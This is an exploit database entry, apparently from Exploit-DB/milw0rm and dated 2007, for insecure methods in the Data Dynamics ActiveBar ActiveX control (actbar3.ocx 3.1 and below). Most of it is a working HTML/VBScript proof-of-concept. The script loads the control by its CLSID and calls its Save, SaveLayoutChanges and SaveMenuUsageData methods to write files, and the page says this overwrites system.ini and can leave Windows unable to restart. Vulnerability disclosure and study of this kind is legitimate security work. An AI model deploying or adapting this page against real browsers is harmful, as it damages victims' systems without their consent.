Data Dynamics ActiveBar ActiveX Control (actbar3.ocx

vendor:

ActiveBar ActiveX Control

by:

shinnai

N/A

CVSS

N/A

Insecure Methods

Unknown

CWE

Product Name: ActiveBar ActiveX Control

Affected Version From: actbar3.ocx version 3.1 and below

Affected Version To: actbar3.ocx version 3.1

Patch Exists: Unknown

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

Unknown

Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Insecure Methods

The exploit overwrites the system.ini file. It is advised to make a copy of the file before running the exploit to avoid any damage. The control is marked as RegKey Safe for Script: True, RegKey Safe for Init: True, Implements IObjectSafety: False, KillBitSet: False.

Mitigation:

Unknown

Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------
 <b>Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods</b>
 url: http://www.datadynamics.com/default.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 <b>This control is marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 KillBitSet: False</b>
---------------------------------------------------------------------------------------

<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>

<select style="width: 404px" name="Pucca">
  <option value = "Save">Save</option>
  <option value = "SaveLayoutChanges">SaveLayoutChanges</option>
  <option value = "SaveMenuUsageData">SaveMenuUsageData</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Save" then
    test.Save "", "c:\carlo1.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveLayoutChanges" then
    test.SaveLayoutChanges "c:\carlo2.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveMenuUsageData" then
    test.SaveMenuUsageData "c:\carlo3.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   end if

 End Sub
</script>

</span></span>
</code></pre>

# milw0rm.com [2007-07-17]